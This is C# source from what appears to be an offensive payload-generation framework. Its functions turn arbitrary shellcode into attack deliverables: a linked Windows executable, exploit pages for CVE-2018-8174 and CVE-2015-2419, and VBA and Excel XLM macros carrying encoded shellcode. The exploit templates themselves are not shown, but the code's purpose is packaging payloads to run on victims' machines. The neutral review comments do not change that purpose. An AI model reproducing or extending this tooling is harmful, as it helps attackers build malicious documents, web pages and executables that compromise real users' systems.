/// <summary>
/// Produces the two YASM inputs needed to embed a raw byte blob under a global symbol:
/// a binary file holding <c>shellcode.Bytes</c>, and an assembly stub that declares
/// <paramref name="symbolname"/> global and pulls the binary in with <c>incbin</c>.
/// </summary>
/// <param name="shellcode">Supplies the bytes written to the randomly named <c>.bin</c> file.</param>
/// <param name="symbolname">Label and <c>Global</c> name emitted in the stub.</param>
/// <param name="sectionName">
/// Optional section name. When it is null but <paramref name="sectionWritable"/> has a value,
/// <c>.text</c> is used.
/// </param>
/// <param name="sectionWritable">
/// When true, the SECTION directive carries <c>write, execute, read</c>. When false or null,
/// no attributes are appended.
/// </param>
/// <returns>The binary file followed by the assembly stub, in that order.</returns>
/// <remarks>
/// NOTE(review): <paramref name="symbolname"/> and <paramref name="sectionName"/> are placed into
/// the assembly text unescaped, so a quote or line break in either changes the generated source.
/// Callers are presumably expected to pass plain identifiers; confirm.
/// NOTE(review): a true <paramref name="sectionWritable"/> requests a section that is both
/// writable and executable.
/// </remarks>
private static IEnumerable<AssemblySourceFile<YASM>> CreateSource(IShellcode shellcode, string symbolname, string sectionName = null, bool? sectionWritable = null)
{
    // The blob goes into its own file so the stub can reference it by name.
    var binName = Utils.RandomString(10) + ".bin";
    var binFile = new AssemblySourceFile<YASM>(shellcode.Bytes, binName);

    // With neither option supplied no SECTION directive is written at all,
    // leaving section placement to the assembler.
    var sectionLine = "";
    if (sectionName != null || sectionWritable.HasValue)
    {
        sectionName = sectionName ?? ".text";
        var attributes = sectionWritable == true ? " write, execute, read" : "";
        sectionLine = $"SECTION '{sectionName}'" + attributes + "\r\n";
    }

    var source = $"Global {symbolname}\r\n{sectionLine}{symbolname}:\r\n\tincbin '{binName}'";
    var asmFile = new AssemblySourceFile<YASM>(source, Utils.RandomString(10) + ".asm");

    return new List<AssemblySourceFile<YASM>> { binFile, asmFile };
}
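/// <summary>
/// Assembles <paramref name="shellcode"/> with the YASM plugin and links the resulting object
/// file with the GoDevTool linker plugin into an <see cref="Executable"/>.
/// </summary>
/// <param name="shellcode">Bytes to embed; wrapped in a <c>RawShellcodeYasmAssemblySource</c>.</param>
/// <param name="targetArch">Selects the Win64 or Win32 object-file type used for assembling and linking.</param>
/// <returns>
/// The linked executable. Its ENTRY setting is the name the assembly source reports through
/// <c>ICFunction</c> (presumably the symbol name passed to it; confirm against that class).
/// </returns>
/// <exception cref="ArgumentOutOfRangeException">
/// <paramref name="targetArch"/> is neither <c>x64</c> nor <c>x86</c>.
/// </exception>
static Executable ShellcodeToExe(IShellcode shellcode, TargetArch targetArch)
{
    // Same fixed symbol for both architectures; kept in one place so the branches cannot drift.
    const string EntrySymbol = "SheSellsShellCodesByTheSilkRoad";

    switch (targetArch)
    {
        case TargetArch.x64:
        {
            var rawShellcodeAsm = new RawShellcodeYasmAssemblySource(shellcode, symbolName: EntrySymbol);
            var staticLibrary = ((IAssembler<YASM, Win64ObjectFile>)new MyWarez.Plugins.Yasm.Yasm()).Assemble(rawShellcodeAsm);
            var entryPoint = ((ICFunction)rawShellcodeAsm).Name;
            var linkerConfig = new MyWarez.Plugins.GoDevTool.Linker.Config(ENTRY: entryPoint);
            return ((ILinker<Win64ObjectFile, Executable>)new MyWarez.Plugins.GoDevTool.Linker(linkerConfig)).Link(staticLibrary);
        }
        case TargetArch.x86:
        {
            var rawShellcodeAsm = new RawShellcodeYasmAssemblySource(shellcode, symbolName: EntrySymbol);
            var staticLibrary = ((IAssembler<YASM, Win32ObjectFile>)new MyWarez.Plugins.Yasm.Yasm()).Assemble(rawShellcodeAsm);
            var entryPoint = ((ICFunction)rawShellcodeAsm).Name;
            var linkerConfig = new MyWarez.Plugins.GoDevTool.Linker.Config(ENTRY: entryPoint);
            return ((ILinker<Win32ObjectFile, Executable>)new MyWarez.Plugins.GoDevTool.Linker(linkerConfig)).Link(staticLibrary);
        }
        default:
            // A bare Exception gave callers no hint which argument was wrong or what value it had.
            throw new ArgumentOutOfRangeException(nameof(targetArch), targetArch, "Unsupported target architecture.");
    }
}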
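/// <summary>
/// Checks that the shellcode's architecture is listed in <c>ValidShellcodeArchs</c> and, if so,
/// returns its bytes encoded by <c>Utils.EncodeShellcode</c> using the class's <c>BadChars</c>.
/// </summary>
/// <param name="shellcode">Source of the bytes and the architecture value.</param>
/// <returns>The encoded bytes returned by <c>Utils.EncodeShellcode</c>.</returns>
/// <exception cref="ArgumentNullException"><paramref name="shellcode"/> is null.</exception>
/// <exception cref="ArgumentException">
/// The shellcode's architecture is not in <c>ValidShellcodeArchs</c>.
/// </exception>
private static byte[] EncodeShellcode(IShellcode shellcode)
{
    // Fail with a named argument instead of a NullReferenceException on the Arch access below.
    if (shellcode == null)
    {
        throw new ArgumentNullException(nameof(shellcode));
    }

    if (!ValidShellcodeArchs.Contains(shellcode.Arch))
    {
        // The original threw a message-less ArgumentException; say what was rejected.
        throw new ArgumentException($"Shellcode architecture '{shellcode.Arch}' is not supported here.", nameof(shellcode));
    }

    return Utils.EncodeShellcode(shellcode.Bytes, shellcode.Arch, BadChars);
}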
/// <summary>
/// Creates an assembly source whose files come from <c>CreateSource</c> and records the
/// symbol name the source was built with.
/// </summary>
/// <param name="shellcode">Forwarded to <c>CreateSource</c>.</param>
/// <param name="symbolName">Forwarded to <c>CreateSource</c> and stored in <c>SymbolName</c>.</param>
/// <param name="sectionName">Optional section name, forwarded unchanged.</param>
/// <param name="sectionWritable">Optional writable flag, forwarded unchanged.</param>
public RawShellcodeYasmAssemblySource(IShellcode shellcode, string symbolName, string sectionName = null, bool? sectionWritable = null)
    : base(CreateSource(
        shellcode: shellcode,
        symbolname: symbolName,
        sectionName: sectionName,
        sectionWritable: sectionWritable))
{
    SymbolName = symbolName;
}
/// <summary>
/// Builds the CVE-2018-8174 document by formatting <c>Template</c> with the shellcode bytes
/// after <c>Utils.TransformShellcode</c> has converted them using the <c>"js_le"</c> format.
/// </summary>
/// <param name="shellcode">
/// Supplies the bytes and the architecture value handed to the transform. The architecture is
/// not validated in this constructor.
/// </param>
/// <remarks>
/// Note: the payload might execute twice.
/// CVE-2018-8174 is a Windows VBScript engine flaw that Microsoft patched in May 2018.
/// NOTE(review): "js_le" presumably names a little-endian JavaScript-style encoding; confirm
/// against Utils.TransformShellcode.
/// </remarks>
public CVE_2018_8174(IShellcode shellcode)
    : base(string.Format(Template, Utils.TransformShellcode(shellcode.Bytes, shellcode.Arch, "js_le")))
{
}
/// <summary>
/// Stores the supplied shellcode in <c>Shellcode</c>. No validation or encoding happens here.
/// </summary>
/// <param name="shellcode">The value assigned to <c>Shellcode</c>; a null is stored as-is.</param>
public ShellcodeVbaMacro(IShellcode shellcode)
{
    Shellcode = shellcode;
}
/// <summary>
/// Builds the Internet Explorer CVE-2015-2419 page by formatting <c>Template</c> with the
/// shellcode bytes rendered by <c>Utils.BytesToJavaScriptArray</c>.
/// </summary>
/// <param name="shellcode">
/// Supplies the bytes. Its architecture is not read or checked in this constructor.
/// </param>
/// <remarks>
/// Note: the payload might fire twice.
/// CVE-2015-2419 was patched by Microsoft in July 2015.
/// </remarks>
public CVE_2015_2419(IShellcode shellcode)
    : base(string.Format(Template, Utils.BytesToJavaScriptArray(shellcode.Bytes)))
{
}
/// <summary>
/// Encodes the shellcode with <c>EncodeShellcode</c>, converts the result with
/// <c>ShellCodeToCellMatrix</c>, and passes it to the base class with
/// <c>macroEnabled</c> set to true.
/// </summary>
/// <param name="shellcode">Input to <c>EncodeShellcode</c>; any exception it throws propagates from here.</param>
/// <remarks>
/// NOTE(review): the shape of the cell matrix and what the base class does with
/// <c>macroEnabled</c> are not visible from this constructor.
/// </remarks>
public ShellcodeXlmMacro(IShellcode shellcode)
    : base(ShellCodeToCellMatrix(EncodeShellcode(shellcode)), macroEnabled: true)
{
}